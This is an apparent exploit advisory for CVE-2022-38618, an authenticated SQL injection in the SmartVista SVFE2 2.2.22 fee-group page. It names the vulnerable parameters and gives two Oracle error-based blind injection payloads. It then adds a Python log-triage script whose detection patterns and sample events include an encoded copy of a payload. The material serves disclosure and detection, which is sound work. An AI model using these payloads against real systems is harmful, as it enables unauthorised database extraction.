# SQL Injection in Terminal Tariff Group feature of SmartVista SVFE2 version 2.2.22 (CVE-2022-38618)

### CVE-2022-38618

**Exploit Title:** SQL Injection in Terminal Tariff Group feature of SmartVista SVFE2 version 2.2.22

**Date:** 26/07/2022

**Exploit Author:** Trong Pham aka Dtro of VietSunshine Cyber Security Services

**Vendor Homepage:** <https://www.bpcbt.com/>

**Affected Version(s):** SmartVista SVFE2 version 2.2.22

**Description:** SmartVista SVFE2 version 2.2.22 and earlier are affected by an SQL Injection vulnerability. An authenticated user could inject an SQL query into the "UserForm:j\_id88", "UserForm:j\_id90" and "UserForm:j\_id92" parameters in /SVFE2/pages/feegroups/country\_group.jsf to dump all databases.

**Steps to reproduce:**

* An attacker requires an account on SmartVista SVFE2. The attacker can use a quote character to break the query string and inject an SQL payload into the "UserForm:j\_id88", "UserForm:j\_id90" or "UserForm:j\_id92" parameter in /SVFE2/pages/feegroups/country\_group.jsf. The response data could help the attacker identify whether an injected SQL query is correct or not.
* Example of injecting SQL into the "UserForm:j\_id90" parameter:
  * `X'||(SELECT+CASE+WHEN+(user='Right_user')+THEN+TO_CHAR(1/0)+ELSE+NULL+END+FROM+dual)||'X` -> Correct query -> Return data
  * `X'||(SELECT+CASE+WHEN+(user='Wrong_user')+THEN+TO_CHAR(1/0)+ELSE+NULL+END+FROM+dual)||'X` -> Wrong query -> Return data with error messages (Database error "ORA-01476")
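For detection, the behaviour described above can be hunted in request logs. The following is an added example, not part of the original advisory or the vendor's code: it flags requests to the affected page whose three parameters carry the markers seen in the example payloads, and raises severity when the response contains ORA-01476. It assumes the form is posted URL-encoded and that request bodies and response text are logged; the event tuple layout, user names and severity levels are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Endpoint, parameter names and the ORA-01476 signal come from the advisory.
ENDPOINT = "/SVFE2/pages/feegroups/country_group.jsf"
PARAMS = {"UserForm:j_id88", "UserForm:j_id90", "UserForm:j_id92"}
MARKERS = {  # traits of a value that escapes the string literal
    "quote": re.compile(r"'"),
    "concat": re.compile(r"\|\|"),
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "div_by_zero": re.compile(r"\b1\s*/\s*0\b"),
}

def inspect_request(path, body):
    """Return {param: [marker names]} for the advisory's parameters."""
    if path.split("?", 1)[0] != ENDPOINT:
        return {}
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        found = [m for m, rx in MARKERS.items() if rx.search(value)]
        if name in PARAMS and found:
            hits[name] = found
    return hits

def triage(events):
    """events: (user, path, form_body, response_text) tuples -> alert dicts."""
    alerts = []
    for user, path, body, response in events:
        hits = inspect_request(path, body)
        if not hits:
            continue
        if "ORA-01476" in response:      # injected expression was evaluated
            severity = "high"
        elif any(len(m) > 1 for m in hits.values()):
            severity = "medium"
        else:                            # e.g. a lone apostrophe in a name
            severity = "low"
        alerts.append({"user": user, "severity": severity, "params": hits})
    return alerts

# Constructed sample events (users and responses are made up).
SAMPLE = [
    ("alice", ENDPOINT, "UserForm%3Aj_id88=EU&UserForm%3Aj_id90=Europe", "OK"),
    ("bob", ENDPOINT, "UserForm%3Aj_id90=Cote+d%27Ivoire", "OK"),
    ("carol", ENDPOINT,
     "UserForm%3Aj_id90=X%27%7C%7C%28SELECT+CASE+WHEN+%28user%3D%27Wrong_user%27%29"
     "+THEN+TO_CHAR%281%2F0%29+ELSE+NULL+END+FROM+dual%29%7C%7C%27X",
     "ORA-01476: divisor is equal to zero"),
]
```

A lone apostrophe is kept at low severity because legitimate group names can contain one; the combination of markers, or the Oracle error in the response, is what separates probing from normal input.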
